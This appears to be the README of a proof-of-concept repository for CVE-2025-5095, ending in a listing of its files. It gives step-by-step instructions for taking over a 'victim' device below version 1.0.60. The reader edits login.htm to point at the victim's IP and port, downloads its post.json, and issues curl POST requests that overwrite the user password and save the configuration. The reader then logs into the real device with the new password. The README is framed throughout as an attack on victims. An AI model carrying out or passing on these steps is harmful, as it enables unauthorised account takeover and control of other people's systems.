Python POC for CVE-2025-5095How To Use:
Open Login.htm and edit the places where IP:PORT is to the victim address
<img width="1134" height="466" alt="image" src="https://github.com/user-attachments/assets/107a5515-1c32-4404-b19c-ca382ff6eeb3" />
Edit the var LoginVersion = "Check On The Victim Site"; part to the victim page version, by this, you can visit the victim page and view as source
**WARNING: THIS CVE ONLY WORKS ON VERSIONS OLDER THAN 1.0.60**
<img width="506" height="112" alt="image" src="https://github.com/user-attachments/assets/9ab72bc9-f7d8-4538-8aac-d52ffcfd422b" />
Download the post.json file from the victim site (http://victimip:port/post.json)
Move it to the script folder and you gonna have 3 files
<img width="629" height="86" alt="image" src="https://github.com/user-attachments/assets/c5fe5bb8-b70f-4d58-9132-1b2c6ddab233" />
Now run the python file and access 127.0.0.1:8080/login.htm (If the port 8080 is already in use, you can change by opening the script on a text editor and change the last part)
<img width="574" height="60" alt="image" src="https://github.com/user-attachments/assets/e5d60db5-16a1-4ea2-b649-5153f00addd7" />
*Ignore the alert when opening the login page*
Open A Terminal And use this curl commands, if it prints "success" it worked.
curl -v -X POST http://localhost:8080/post.json -d "UserPassword0=newtestpass"
curl -v -X POST http://localhost:8080/post.json -d "UsersSaveConfig=true"
<img width="1014" height="758" alt="image" src="https://github.com/user-attachments/assets/98e696e9-6443-4bd0-aff9-560bde720c04" />
To check if the page changed, send this command:
curl http://localhost:8080/check_password
Now, visit the victim site (not the localhost one) and insert the new password, on this example, the password is "newtestpass"
[4.0K] /data/pocs/3e026908476ffdc40aad1bba9b15055e8282333e
├── [1.0K] app.py
├── [ 34K] LICENSE
├── [ 10K] login.htm
├── [8.7K] post.json
└── [1.7K] README.md
0 directories, 5 files